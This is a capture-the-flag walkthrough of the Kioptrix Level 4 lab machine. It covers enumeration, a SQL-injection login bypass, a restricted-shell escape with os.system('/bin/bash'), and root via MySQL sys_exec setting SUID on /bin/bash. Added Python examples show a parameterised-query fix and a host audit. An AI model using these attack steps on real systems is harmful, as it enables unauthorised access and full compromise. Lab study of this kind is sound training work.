Kioptrix Level 1.3 (#4) Walkthrough
Enumeration
Nmap
Scanning the machine's open ports
nmap -sC -sV -oA nmap/Level4 192.168.43.242
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-12 04:21 EDT
Nmap scan report for 192.168.43.242
Host is up (0.00031s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:1C:64:47 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h00m02s, deviation: 2h49m43s, median: 1s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2020-05-12T04:21:17-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.63 seconds
Dirb
dirb http://192.168.43.242
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue May 12 04:22:50 2020
URL_BASE: http://192.168.43.242/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.43.242/ ----
+ http://192.168.43.242/cgi-bin/ (CODE:403|SIZE:329)
==> DIRECTORY: http://192.168.43.242/images/
+ http://192.168.43.242/index (CODE:200|SIZE:1255)
+ http://192.168.43.242/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.43.242/john/
+ http://192.168.43.242/logout (CODE:302|SIZE:0)
+ http://192.168.43.242/member (CODE:302|SIZE:220)
+ http://192.168.43.242/server-status (CODE:403|SIZE:334)
---- Entering directory: http://192.168.43.242/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.43.242/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue May 12 04:22:54 2020
DOWNLOADED: 4612 - FOUND: 6
What caught my eye was the /john page.
Enum4linux
enum4linux -a 192.168.43.242
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue May 12 04:23:50 2020
==========================
| Target Information |
==========================
Target ........... 192.168.43.242
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
======================================================
| Enumerating Workgroup/Domain on 192.168.43.242 |
======================================================
[+] Got domain/workgroup name: WORKGROUP
==============================================
| Nbtstat Information for 192.168.43.242 |
==============================================
Looking up status of 192.168.43.242
KIOPTRIX4 <00> - B <ACTIVE> Workstation Service
KIOPTRIX4 <03> - B <ACTIVE> Messenger Service
KIOPTRIX4 <20> - B <ACTIVE> File Server Service
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
MAC Address = 00-00-00-00-00-00
=======================================
| Session Check on 192.168.43.242 |
=======================================
[+] Server 192.168.43.242 allows sessions using username '', password ''
=============================================
| Getting domain SID for 192.168.43.242 |
=============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
========================================
| OS information on 192.168.43.242 |
========================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.43.242 from smbclient:
[+] Got OS info for 192.168.43.242 from srvinfo:
KIOPTRIX4 Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
platform_id : 500
os version : 4.9
server type : 0x809a03
===============================
| Users on 192.168.43.242 |
===============================
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null)
user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]
===========================================
| Share Enumeration on 192.168.43.242 |
===========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP
[+] Attempting to map shares on 192.168.43.242
//192.168.43.242/print$ Mapping: DENIED, Listing: N/A
//192.168.43.242/IPC$ [E] Can't understand response:
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
======================================================
| Password Policy Information for 192.168.43.242 |
======================================================
[E] Unexpected error from polenum:
[+] Attaching to 192.168.43.242 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Missing required parameter 'digestmod'.
[+] Trying protocol 445/SMB...
[!] Protocol failed: Missing required parameter 'digestmod'.
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 0
================================
| Groups on 192.168.43.242 |
================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=========================================================================
| Users on 192.168.43.242 via RID cycling (RIDS: 500-550,1000-1050) |
=========================================================================
[I] Found new SID: S-1-5-21-2529228035-991147148-3991031631
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-2529228035-991147148-3991031631 and logon username '', password ''
S-1-5-21-2529228035-991147148-3991031631-500 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-501 KIOPTRIX4\nobody (Local User)
S-1-5-21-2529228035-991147148-3991031631-513 KIOPTRIX4\None (Domain Group)
S-1-5-21-2529228035-991147148-3991031631-1000 KIOPTRIX4\root (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)
===============================================
| Getting printer info for 192.168.43.242 |
===============================================
No printers returned.
enum4linux complete on Tue May 12 04:24:07 2020
From enum4linux, we know that there are three users on that machine:
S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)
Exploit
We navigate to the page and see this:
I tried some SQL injection and realized that only the password field is vulnerable. So, using the username list I got from enum4linux (robert, john and loneferret), maybe we can get their passwords to log in to their accounts. The SQL injection I used in the password field is admin'or 1=1 or ''='
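To show why that payload works and how the form should have been written, here is an added example (not code from the walkthrough or from the Kioptrix box): a constructed members table in SQLite, with the login query built by string concatenation beside a parameterised version. The table and column names and the placeholder credentials are assumptions.

```python
import sqlite3

# Constructed stand-in for the members table behind checklogin.php. The table
# and column names are assumptions; the credential values are placeholders.
SAMPLE_USERS = [("john", "placeholder-1"), ("robert", "placeholder-2")]

# The password-field payload the walkthrough used.
PAYLOAD = "admin'or 1=1 or ''='"


def make_db():
    """Build an in-memory SQLite database holding the sample members table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Login check with the defect the walkthrough exploits: the password is
    pasted into the SQL text, so quotes inside it rewrite the WHERE clause.
    Returns the usernames the query matched."""
    sql = ("SELECT username FROM members WHERE username='%s' AND password='%s'"
           % (username, password))
    return [row[0] for row in conn.execute(sql)]


def login_fixed(conn, username, password):
    """Same check with a parameterised query: the driver passes the values
    separately from the SQL text, so the payload is compared as a literal
    string and never matches."""
    sql = "SELECT username FROM members WHERE username=? AND password=?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def rendered_where(username, password):
    """Show the WHERE clause the vulnerable version actually sends. With the
    payload it becomes
        username='john' AND password='admin'or 1=1 or ''=''
    and because AND binds tighter than OR, the 1=1 branch matches every row."""
    return "username='%s' AND password='%s'" % (username, password)


if __name__ == "__main__":
    db = make_db()
    print(rendered_where("john", PAYLOAD))
    print("vulnerable:", login_vulnerable(db, "john", PAYLOAD))  # every user
    print("fixed:     ", login_fixed(db, "john", PAYLOAD))       # nobody
```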
robert's and john's credentials are below:
Meanwhile, loneferret returns this:
After this, we can try to SSH in as both users and find out what is interesting inside.
After getting into robert's account, I found that navigating to the home directory is not allowed; after trying to change into any directory twice, I got a warning and was kicked out.
As we can see, only a few commands are available to us.
We are actually inside a restricted shell. If we want to escape it, we need to type
echo os.system('/bin/bash')
After that, we get a proper shell and are ready to escalate privileges.
Privilege Escalation
I wandered around and ran
ps aux | grep root
and found something interesting:
We know that MySQL is running as root, so maybe this is the way in.
I also found in /var/www/checklogin.php that the MySQL root user has no password, so we can log in directly without one.
We logged in as the MySQL root user.
After surfing some websites on Google, I came across this website, which teaches how to exploit MySQL.
With that guidance, we can type
mysql
use sql
SELECT sys_exec('chmod +s /bin/bash');
Then exit the mysql shell
and type bash -p
and you will get root!
Congratulations!
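As an added example (not from the walkthrough), here is an audit that checks the three conditions this escalation relied on: a service daemon running as root, a shell-executing UDF registered in mysql.func, and a setuid-root binary that should not be one. The ps, mysql.func and find samples are constructed, and the service-account mapping and SUID allow-list are assumptions.

```python
import os

# Constructed samples (not captured from the box), in the formats a defender
# would pull from the host: `ps aux`, rows of mysql.func, and the output of
# `find / -type f -printf '%m %u %p\n'`.
SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1   2844  1692 ?        Ss   04:20   0:01 /sbin/init
root      4532  0.0  0.3   5876  3188 ?        S    04:20   0:00 /bin/sh /usr/bin/mysqld_safe
root      4574  0.0  3.0 126676 16484 ?        Sl   04:20   0:00 /usr/sbin/mysqld --basedir=/usr
www-data  4710  0.0  0.2  22580  9832 ?        S    04:21   0:00 /usr/sbin/apache2 -k start
"""
SAMPLE_FUNC = [("sys_exec", "lib_mysqludf_sys.so"), ("sys_eval", "lib_mysqludf_sys.so")]
SAMPLE_FIND = """\
4755 root /bin/su
4755 root /bin/bash
755 root /bin/ls
"""

# Daemons that should run under a dedicated service account, never as root.
SERVICE_ACCOUNTS = {"mysqld": "mysql", "apache2": "www-data"}
# MySQL UDFs that run shell commands with the server process's privileges.
SHELL_UDFS = {"sys_exec", "sys_eval"}
# Setuid-root binaries expected on the host (constructed allow-list).
EXPECTED_SUID = {"/bin/su", "/usr/bin/passwd", "/usr/bin/sudo"}


def daemons_running_as_root(ps_text):
    """Return 'exe (expected user)' for known daemons whose process owner is root."""
    hits = []
    for line in ps_text.splitlines()[1:]:       # skip the header row
        fields = line.split(None, 10)           # field 10 is COMMAND, spaces kept
        user, command = fields[0], fields[10]
        exe = os.path.basename(command.split()[0])
        if user == "root" and exe in SERVICE_ACCOUNTS:
            hits.append("%s (expected %s)" % (exe, SERVICE_ACCOUNTS[exe]))
    return hits


def shell_udfs_installed(func_rows):
    """Return the names of registered UDFs that hand SQL users a shell."""
    return [name for name, _lib in func_rows if name in SHELL_UDFS]


def unexpected_suid_root(find_text):
    """Return setuid, root-owned paths that are not on the allow-list."""
    hits = []
    for line in find_text.splitlines():
        mode, owner, path = line.split(None, 2)
        if int(mode, 8) & 0o4000 and owner == "root" and path not in EXPECTED_SUID:
            hits.append(path)
    return hits


def audit(ps_text=SAMPLE_PS, func_rows=SAMPLE_FUNC, find_text=SAMPLE_FIND):
    """Run all three checks; every non-empty list is a finding to remediate."""
    return {
        "daemons_as_root": daemons_running_as_root(ps_text),
        "shell_udfs": shell_udfs_installed(func_rows),
        "unexpected_suid": unexpected_suid_root(find_text),
    }
```

Each finding maps to a fix: run mysqld under the mysql account, drop the shell UDFs from mysql.func, and clear the setuid bit on any shell that carries it.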